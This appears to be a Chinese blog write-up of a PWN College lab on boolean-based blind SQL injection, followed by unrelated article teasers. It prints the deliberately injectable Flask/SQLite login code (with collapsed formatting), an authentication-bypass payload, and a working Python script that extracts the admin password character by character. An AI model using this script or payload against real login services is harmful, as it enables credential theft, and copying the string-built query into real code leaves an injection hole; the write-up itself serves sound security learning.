当前位置：首页 > news >正文

PWN College 关于sql盲注

news 2026/4/1 8:32:59

在这个场景中，我们需要利用SQL注入漏洞来泄露flag，但是应用程序并不会直接返回查询结果。相反，我们需要根据应用程序的行为差异（登录成功与否）来推断查询结果。这就是所谓的"布尔盲注"（Boolean-based Blind SQL Injection）。

我们可以通过构造一系列的"是/否"问题，并根据应用程序的响应来逐位获取flag。

服务器的处理逻辑如下所示：

#!/opt/pwn.college/pythonimport tempfile
import sqlite3
import flask
import osapp = flask.Flask(__name__)class TemporaryDB:def __init__(self):self.db_file = tempfile.NamedTemporaryFile("x", suffix=".db")def execute(self, sql, parameters=()):connection = sqlite3.connect(self.db_file.name)connection.row_factory = sqlite3.Rowcursor = connection.cursor()result = cursor.execute(sql, parameters)connection.commit()return resultdb = TemporaryDB()
# https://www.sqlite.org/lang_createtable.html
db.execute("""CREATE TABLE users AS SELECT "admin" AS username, ? as password""", [open("/flag").read()])
# https://www.sqlite.org/lang_insert.html
db.execute("""INSERT INTO users SELECT "guest" as username, "password" as password""")@app.route("/", methods=["POST"])
def challenge_post():username = flask.request.form.get("username")password = flask.request.form.get("password")if not username:flask.abort(400, "Missing `username` form parameter")if not password:flask.abort(400, "Missing `password` form parameter")try:# https://www.sqlite.org/lang_select.htmlquery = f'SELECT rowid, * FROM users WHERE username = "{username}" AND password = "{password}"'print(f"DEBUG: {query=}")user = db.execute(query).fetchone()except sqlite3.Error as e:flask.abort(500, f"Query: {query}\nError: {e}")if not user:flask.abort(403, "Invalid username or password")flask.session["user"] = usernamereturn flask.redirect(flask.request.path)@app.route("/", methods=["GET"])
def challenge_get():if not (username := flask.session.get("user", None)):page = "<html><body>Welcome to the login service! Please log in as admin to get the flag."else:page = f"<html><body>Hello, {username}!"return page + """<hr><form method=post>User:<input type=text name=username>Pass:<input type=text name=password><input type=submit value=Submit></form></body></html>"""app.secret_key = os.urandom(8)
port = 8080 if os.geteuid() else 80
app.config['SERVER_NAME'] = f"challenge.localhost:{port}"
app.run("challenge.localhost", port)

这里我们需要构造合适的payload:

admin"--

-- 注释掉查询的剩余部分

整个查询会变成：

SELECT rowid, * FROM users WHERE username = "admin"--" AND password = "anything"

进一步得到

SELECT rowid, * FROM users WHERE username = "admin" AND substr((SELECT password FROM users WHERE username="admin"), 1, 1) = "a"--" AND password = "anything"

构造脚本逐字符猜测

import requests
import stringurl = "http://challenge.localhost:8080"
flag = ""
charset = string.printable.strip()def check(payload):response = requests.post(url, data={"username": payload, "password": "anything"}, allow_redirects=False)return response.status_code == 302# 获取flag长度
for i in range(1, 100):payload = f'admin" AND length((SELECT password FROM users WHERE username="admin")) = {i}--'if check(payload):print(f"Flag length: {i}")flag_length = ibreak# 获取flag内容
for i in range(1, flag_length + 1):for char in charset:payload = f'admin" AND substr((SELECT password FROM users WHERE username="admin"), {i}, 1) = "{char}"--'if check(payload):flag += charprint(f"Current flag: {flag}")breakprint(f"Final flag: {flag}")

PWN College 关于sql盲注

在这个场景中，我们需要利用SQL注入漏洞来泄露flag，但是应用程序并不会直接返回查询结果。相反，我们需要根据应用程序的行为差异（登录成功与否）来推断查询结果。这就是所谓的"布尔盲注"（Boolean-b…...

编程日记 2024/9/18 19:41:01

【Linux篇】Http协议（1）（笔记）

目录一、http基本认识 1. Web客户端和服务器 2. 资源 3. URI 4. URL 5. 事务 6. 方法 7. 状态码二、HTTP报文 1. 报文的流动 （1）流入源端服务器 （2）向下游流动 2. 报文语法三、TCP连接 1. TCP传输方式 2. TCP连…...

编程日记 2024/9/18 19:37:58

员工疯狂打CALL！解锁企业微信新玩法，2024年必学秘籍来啦！

现在工作离不开电脑手机，公司交流也得用新招。腾讯出了个企业微信，就是给公司用的聊天工具。它功能强大，操作简便，很多公司用它来让工作更高效，团队合作更紧密。接下来，我会简单说说怎么上手企业微信&#…...

编程日记 2024/9/18 19:36:56

Spring boot从0到1 - day01

前言 Spring 框架作为 Java 领域中最受欢迎的开发框架之一，提供了强大的支持来帮助开发者构建高性能、可维护的 Web 应用。学习目标 Spring 基础 Spring框架是什么？Spring IoC与Aop怎么理解？ Spring Boot 的快速构建 Spring 基础学习…...

编程日记 2024/9/18 19:34:26

Flutter 项目结构的区别

如果需要调用原生代码，请创建一个plugin类型的项目开发。如果需要调用C语言，请参考文档：Flutter项目中调用C语言plugin 其实是 package 的一种，全称是 plugin package，我们简称为 plugin，中文叫插件。 1. A…...

编程日记 2024/9/18 19:33:04

EfficientFormerV2：重新思考视觉变换器以实现与MobileNet相当的尺寸和速度。

摘要 https://arxiv.org/pdf/2212.08059 随着视觉变换器（ViTs）在计算机视觉任务中的成功，近期的研究尝试优化ViTs的性能和复杂度，以实现在移动设备上的高效部署。提出了多种方法来加速注意力机制，改进低效设计&#xf…...

编程日记 2024/9/18 19:32:03

ASP.NET Core高效管理字符串集合

我们在开发 Web 项目时经常遇到需要管理各种来源的字符串集合（例如HTTP 标头、查询字符串、设置的值等）的情况。合理的管理这些字符串集合不仅可以减少出bug的几率，也能提高应用程序的性能。ASP.NET Core 为我们提供了一种特殊的只读结构体 S…...

编程日记 2024/9/18 19:31:01

开始 ubuntu22.04 LTSVMwareTools-10.3.25-20206839.tar.gzVMware Workstation 17 Pro 各种该尝试的配置都尝试了,比如: 1.开启复制粘贴拖拽; 2.VMware Tools拖拽失效; 3.解决VMware无法拖拽. 均没有奏效. 安装过程报错, 报错异常: The installation of VMware Tools 10.3.25…...

编程日记 2024/9/18 19:30:00

Docker 容器网络技术

Docker 容器网络技术一、概述 Docker 容器技术在微服务架构和云原生应用中扮演着重要角色。容器的轻量化和快速启动特性，使得它们成为现代应用部署的首选。然而，容器的网络连接和管理是一个复杂的问题，尤其是当涉及到容器间通信时。Docker…...

编程日记 2024/9/18 19:28:58

C++ 起始帧数、结束帧数、剪辑视频

C 指定起始帧数、结束帧数、剪辑视频 C 无法直接用H264，只能用avi编码格式 #include <iostream> #include <opencv2/opencv.hpp>int main() {// 读取视频：创建了一个VideoCapture对象，参数为摄像头编号std::string path &quo…...

编程日记 2024/9/18 19:27:54

【项目一】基于pytest的自动化测试框架———解读requests模块

解读python的requests模块什么是requests模块基础用法GET与POST的区别数据传递格式会话管理与持久性连接处理相应结果应对HTTPS证书验证错误处理与异常捕获这篇blog主要聚焦如何使用 Python 中的 requests 模块来实现接口自动化测试。下面我介绍一下 requests 的常用方法、数…...

编程日记 2024/9/18 19:24:51

升级Ubuntu内核的几种方法

注意： Ubuntu主线内核由 Ubuntu 内核团队提供，用于测试和调试目的。它们不受支持且不适合生产使用。仅当它们可以解决当前内核遇到的关键问题时，才应该安装它们。 1、手动下载deb文件升级内核来源：kernel.ubuntu.com/main…...

编程日记 2024/9/18 19:23:50

Android绘制靶面，初步点击位置区域划分取值测试

自定义View： public class TargetView extends View {private Paint paint;private int[] radii {100, 250, 400, 550, 700}; // 五个圆的半径private int numberOfSegments 8;private int[][] regionValues; // 存储每个区域的值public TargetView(Context cont…...

编程日记 2024/9/18 19:21:47

【SpringBoot】调度和执行定时任务--Quartz(超详细)

Quartz 是一个功能强大的任务调度框架，广泛用于在 Java 应用程序中定时执行任务，同时它支持 Cron 表达式、持久化任务、集群等特性。以下是 Quartz 的详细使用教程，包括安装、基本概念、简单示例和高级功能。 1. 安装 Quartz 首先&#xff…...

编程日记 2024/9/18 19:18:41

低代码开发平台系统架构概述

概述织信低代码开发平台（产品全称：织信Informat）是一款集成了应用设计、运行与管理的综合性平台。它提供了丰富的功能模块，帮助用户快速构建、部署和维护应用程序。织信低代码平台通过集成丰富的功能模块，为用户提供…...

编程日记 2024/9/18 19:14:27

源码编译llama.cpp 、ggml 后端启用自定义BLAS加速

源码编译llama.cpp 、ggml 后端启用自定义BLAS加速我在llama.cpp 官网上提交了我的解决方案：How to setup OpenBlas on windows? #625 GGML 官网 https://github.com/ggerganov/ggml/issues/959 windows on arm 编译 llama.cpp 、ggml 后端启用自定义BLAS加速 …...

编程日记 2024/9/18 19:09:20

glb数据格式

glb数据格式 glb 文件格式只包含一个glb 文件，文件按照二进制存储，占空间小浏览浏览glb工具的很多，ccs，3D查看器等都可以，不安装软件的话用下面网页加载就可以，免费 glTF Viewer (donmccurdy.com) glb…...

编程日记 2024/9/18 19:08:09

手语识别系统源码分享

手语识别检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer Vision …...

编程日记 2024/9/18 19:06:43

Oracle 数据库部署与实施

文章目录 1. macOS 上部署 Oracle 数据库通过 Docker 在 macOS 上部署 2. Linux 上部署 Oracle 数据库直接在 Linux 上部署通过 Docker 在 Linux 上部署 3. Windows 上部署 Oracle 数据库4. 使用 Docker 部署 Oracle 数据库前提条件拉取 Oracle 数据库 Docker 镜像运行 Oracle …...

编程日记 2024/9/18 19:05:36